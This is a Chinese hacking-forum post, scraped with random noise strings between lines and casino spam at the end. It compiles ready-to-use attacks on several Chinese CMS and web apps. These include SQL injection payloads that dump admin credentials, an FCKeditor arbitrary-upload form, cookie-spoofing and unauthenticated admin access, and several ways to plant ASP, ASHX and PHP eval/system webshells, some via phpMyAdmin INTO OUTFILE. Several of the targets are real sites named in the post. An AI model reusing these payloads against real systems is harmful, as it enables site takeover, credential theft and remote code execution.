! Q, t/ J$ o4 n" T) u: t% A
CKXP网上书店注入漏洞
1 b p; w; e0 Y' O
% {) L- G l. o/ R- J7 x
工具加表:shop_admin 加字段:admin
( Z" `' N, j$ ~& r0 i, Y7 A- U/ S
后台:admin/login.asp
6 F' I/ D0 |% v: C" D u5 o3 A
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
4 p, Z0 _5 z0 ` a j
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
5 w# v7 ]- r$ y+ B1 D; X. t
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% O L* \1 j8 _% o- [7 S
* h8 G3 [8 h% W4 l2 ]
YxShop易想购物商城4.7.1版本任意文件上传漏洞
, D6 _& M# K W- v( f
- N$ X; m+ o+ x, L+ r8 @: p
http://xxoo.com/controls/fckedit
... aspx/connector.aspx
! O& x6 A7 a3 i! K1 S0 f0 P
跳转到网站根目录上传任意文件。
% d2 y+ e! U' m3 s2 k% x$ ^
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
6 a( h/ i( f) Q; j& w; \1 x
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
) S+ i3 ^: W5 j) K) U6 @
Upload a new file:<br>
/ Z* q. j/ k5 a' K
<input type="file" name="NewFile" size="50"><br>
0 Z1 C( k, g2 R% G [8 n
<input id="btnUpload" type="submit" value="Upload">
! p% `5 ?* l+ o- b
</form>
) k1 E# n( G( C4 ? m- j/ {
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; h `- x" d2 c; R. ?
3 [( T; b0 f) l
SDcms 后台拿webshell
& J0 h: N5 L, s0 s0 }) h
5 r1 N& ~$ v9 o. ~5 H: M
第一种方法:
! t# [' ^" t* V4 o/ ?6 i4 {
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
" m0 Q( J: r" W8 f' b' t2 j
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
3 T5 P8 ]. F3 K+ o
用菜刀链接
http://www.xxx.com/inc/const.asp
就搞定了。
* j5 R! B! j7 y
第二种方法:
6 w8 X$ J6 S7 k9 L/ s
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
% b3 G' E$ m4 O! v
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
8 w* c/ q3 p% R# a6 r1 R) e0 r
第三种方法:
# b1 n: W$ f0 e# B
进入后台-->界面管理-->模板文件管理-->创建文件
9 v0 j; _( U8 ~* j F7 h8 y
文件名写入getshell.ashx
1 d7 N$ P6 E& m& V x
内容写入下面内容:
, D2 w8 k0 W$ {/ s- i& J
/====================复制下面的=========================/
- v4 q) x% y. V# w* f
<%@ WebHandler Language="C#" Class="Handler" %>
1 _6 b3 f* x! T& k
using System;
) j- j& Y# z! R* \' D& ~: i
using System.Web;
. U3 ]: c. {4 m |0 R- K
using System.IO;
1 e& z( c+ L2 A, p1 L8 s
public class Handler : IHttpHandler {
/ g: i b$ P: Q& q+ R) {. k" g$ i% \
public void ProcessRequest (HttpContext context) {
2 B# J, ~5 u- a! z2 ]
context.Response.ContentType = "text/plain";
) b4 v1 H- G) A' x
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
! C" C9 C0 d V: k1 e* t- K3 u' x4 P7 x
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
8 ]0 ~3 _5 v3 S. X/ Z
file1.Flush();
% s9 M1 S0 v( r5 Q
file1.Close();
# k: V- L7 @0 t& {+ z+ h8 d& X4 c2 o
}
6 u4 U9 U5 l4 Q) U
public bool IsReusable {
9 R+ ]) {: z' Z7 l) P
get {
8 B: A9 @* e" l8 T* [6 N
return false;
7 W j. W) a# o: g
}
% O9 c. S5 h p
}
`, v4 v: }, m4 C3 ^* B
}
# o# y' T& u c) J
/=============================================/
0 a" A4 Y" _3 X' w+ I7 E" u% k! p
访问这个地址:
http://www.xxx.com/skins/2009/getshell.ashx
7 P+ k5 N0 i- L. x- ^( S( V5 G
会在
http://www.xxx.com/skins/2009/
目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
& Q8 L' a* k" r$ U4 B% o2 F. [$ Y
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% x- n+ P. |* ]' y8 \, ^3 t# J
7 R6 K5 \5 @& q6 U# o3 W, e( a
ESCMS网站管理系统0day
q, O$ I! i$ v
4 j, n' D! i/ i' p4 v; L: t
后台登陆验证是通过admin/check.asp实现的
/ b, p+ x' v- M' ~$ H
' J* N9 S; q5 ]
首先我们打开
http://target.com/admin/es_index.html
( S) Q0 j8 t( [) b" z" J v
然后在COOKIE结尾加上
' A5 T! {$ p e& h- `0 Q8 f
; ESCMS$_SP2=ES_admin=st0p;
4 _# O( k- R* J P q% x8 H4 |0 M
修改,然后刷新
8 n& V5 H- i; Z8 g/ c2 z
进后台了嘎..
( X3 X! V$ ~9 A; l8 T5 |
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
& p5 g* L( c$ @! X4 U: _* m
' i0 {" }9 @* L: R
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
% w+ \, ~, ]& e, R9 G4 s5 T0 [
嘿嘿,成功了,shell地址为
http://target.com/admin/diy.asp
$ g4 j" f% J E7 y3 _7 n0 C: U$ o
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
8 V) L( K8 ~- l4 f" B' v
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
$ p. D& V/ |5 ?7 Y7 N+ M
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" K6 Y5 v. `" O/ ^, i6 t& w9 j
8 X1 | Q3 w K9 Z
宁志网站管理系统后台无验证漏洞及修复
2 \# q/ M/ f+ H& a
! s) o. I* t) i! [9 b4 L- F/ [3 A
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
7 j# B" N8 U l
官方网站:
www.ningzhi.net
+ f4 r2 C. }0 Y8 K/ u
学校网站管理系统 V.2011版本
$ I! a/ F9 U4 ^- O& _9 s L
http://down.chinaz.com/soft/29943.htm
- i" T% @+ F" G4 c, R M% Q
其它版本(如:政府版等),自行下载.
+ d! v: L8 D" k6 u
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
6 ]) j6 j' D" Q* G$ x* f% [
login.asp代码如下:
# s+ W9 c* n0 h; d8 J# S, W
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
; J1 R! {0 F7 C8 x
manage.asp代码我就不帖出来了.反正也没验证.
$ p) E6 \5 F$ I4 D1 F+ N# X1 h
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
, ?- l! p. K4 i0 q T) ?
漏洞利用:
9 D: [7 K" ~5 o! |5 Q
直接访问
http://www.0855.tv/admin/manage.asp
. F, c' h V2 Y# j9 M2 g
数据库操作:
http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
4 d# T$ [: X6 M* X: |) C
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 N6 j+ {0 ^0 P6 D/ t* n7 ^: g3 v
3 k& V$ @* k7 ?' F3 g
phpmyadmin拿shell的四种方法总结及修复
/ Q% T- t3 @( e. h" ~- C
, E% x3 P' y% G# }0 r: p
方法一:
; P5 a6 x0 r* t# M
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
% [% v4 p$ }2 D- c
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
0 z3 r1 `2 p1 v/ A; [8 ]
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
0 a2 _- a; V) \* E1 K
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
& @8 ?) B# s2 q
一句话连接密码:7on
$ V/ ]& T. Z! l4 d: [8 s, V
方法二:
; a/ M" k' l% v3 ?, l4 |1 H0 @- A
读取文件内容: select load_file('E:/xamp/www/s.php');
& N0 X" `$ S+ M+ H/ F0 T/ O
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
# U4 \* M8 C7 {% `2 L
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
/ k( f; K) J S/ ^
方法三:
( l% i9 z% {6 ^+ r1 M4 o, D4 [: h
JhackJ版本 PHPmyadmin拿shell
1 I0 e1 e8 y! [" h- ?5 ?
Create TABLE study (cmd text NOT NULL);
2 ?: L4 m' o% s
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
& f9 [9 |% Q6 P: s/ }1 `
select cmd from study into outfile 'E:/wamp/www/7.php';
2 Y% s3 d) n0 V {% p u
Drop TABLE IF EXISTS study;
O+ b- I" c1 N! ?' y
<?php eval($_POST[cmd])?>
% M N4 u' ?+ ]& L1 f. j
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
& V1 D7 \7 J" g+ g. F
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
/ e$ H6 {* d& n0 `4 w2 M( `
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
, K- x. }3 ]; Q' x6 \
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
, O) }. K! S7 s9 N" a, |) B
方法四:
. e0 E, p* `* @- l9 T; e. n' l0 W
select load_file('E:/xamp/www/study.php');
% @6 h5 H% u5 H, J0 e) r8 f
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
" V: {0 Z. `) q' Y
然后访问网站目录:
http://www.2cto.com/study.php?cmd=dir
6 Z5 G% v" |' U+ W) i$ o
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
* Y4 P: T( n- `7 p- Z5 { h6 V
& S; l8 p& W/ q) O2 a; L; t* s( s
NO.001中学网站管理系统 Build 110628 注入漏洞
' Q; `$ V, Z D V. q/ I, l% ]
0 u1 e1 N! n* _4 H) h1 T
NO.001中学网站管理系统功能模块:
& w, v. c0 a( z$ b
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
* y' l* Z$ [3 m$ f/ F+ ?/ s: X7 Q
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
2 n8 }% o" R) {6 c a6 h; c
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
9 H! b' g; B/ i, F
4.视频图片管理:一级分类,动态添加视频或者图片等信息
' |% i& T+ f2 C9 B" h- ?0 h
5.留言管理:对留言,修改,删除、回复等管理
N' `, p: w3 |
6.校友频道:包括校友资料excel导出、管理等功能
- |- A% h9 }9 T8 @ k
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
7 X) ~* w3 y7 ^2 a7 k0 d
默认后台:admin/login.asp
7 o' S: ?) C. Z4 i" N l$ _6 V2 \
官方演示:
http://demo.001cms.net
+ M6 I' J- S Q+ Q( r; |1 {
源码下载地址:
http://down.chinaz.com/soft/30187.htm
+ ~. `. y: q2 [# i: Y
EXP:
: t# X# s( O* {; ?, U+ n4 E* d
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
+ r, Y; p$ | R3 y% T
测试:
http://demo.001cms.net/shownews.asp?type=
新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
q8 }4 v- E( L* p7 U
getshell:后台有备份,你懂的
" R ?( i" M/ {
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
1 J% {# B7 ^6 i% n' }6 \3 {; O
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
作者:
匿名
时间:
2017-10-28 08:21
casino slots
online casino canada
new online casino
slot machines
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2